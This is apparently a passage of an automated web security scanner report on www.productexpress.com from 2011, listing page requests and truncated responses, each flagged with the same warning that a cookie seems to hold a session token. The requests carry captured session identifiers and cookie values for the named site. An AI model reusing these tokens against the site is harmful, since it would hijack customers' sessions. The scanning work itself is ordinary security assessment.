GET /belts-sort-by-rating.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:43 GMT Server: Apache Set-Cookie: JSESSIONID=82201B6898F5DBD621BC6556FD72C48C; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts-sort-by-style-name-a-to-z.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:42 GMT Server: Apache Set-Cookie: JSESSIONID=E5F154ED7FDCE15961C12D046CAAA561; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts-sort-by-style-name-z-to-a.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:43 GMT Server: Apache Set-Cookie: JSESSIONID=DF5A37AD14EB779195FE7CEA61BCB22A; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts/p2.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:21 GMT Server: Apache Set-Cookie: JSESSIONID=E6E7E89FBC3CEB25C63A4283AC1C8531; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts/p3.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:21 GMT Server: Apache Set-Cookie: JSESSIONID=6F6BE49F1D19FB35F71BCD214FD06F10; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts/p4.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:22 GMT Server: Apache Set-Cookie: JSESSIONID=E2FE81B9766A5751244E0C01587EB3B0; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /belts/p5.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:22 GMT Server: Apache Set-Cookie: JSESSIONID=8F6A992CA6E9738C3CB98B7DC4EDFD60; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /black-and-white-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:46 GMT Server: Apache Set-Cookie: JSESSIONID=26B9868CD5E763F7DCA26F065B6A7106; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /black-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:22 GMT Server: Apache Set-Cookie: JSESSIONID=35A4B3D4C0F4A493483106046D659817; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blue-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:46 GMT Server: Apache Set-Cookie: JSESSIONID=6A8A93125D2E297FB9100979B66545BA; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bookmark.jsp HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:04:23 GMT Server: Apache Set-Cookie: JSESSIONID=39970C568432C4200CFE008772712FA0; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /boots.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:04:08 GMT Server: Apache Set-Cookie: JSESSIONID=5BC2E72B70DBBDC9DC579C6A9C69DAA1; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /boston-traveler-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:33 GMT Server: Apache Set-Cookie: JSESSIONID=A67B4166D933EE270DDC03F63D22FCA1; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /brown-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:22 GMT Server: Apache Set-Cookie: JSESSIONID=730D7B82B2B85991A949C66C4D60D3FD; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /burgundy-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:51 GMT Server: Apache Set-Cookie: JSESSIONID=97B6E4DDBB183B860FB0BC71E0FB937F; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cart?ref=/belts.htm&addStyle=195605 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> <title>Car ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /casual-shoes.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:03:23 GMT Server: Apache Set-Cookie: JSESSIONID=9B99791E7A0697966B16002493DA3207; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>C ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /clothing.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:39 GMT Server: Apache Set-Cookie: JSESSIONID=205F29C106E5F7BE9CEEE4832C781F6F; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>C ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /color-search.jsp HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:01:49 GMT Server: Apache Set-Cookie: JSESSIONID=353AA6ACF93313D26AC67FA1DEEEA098; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>C ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
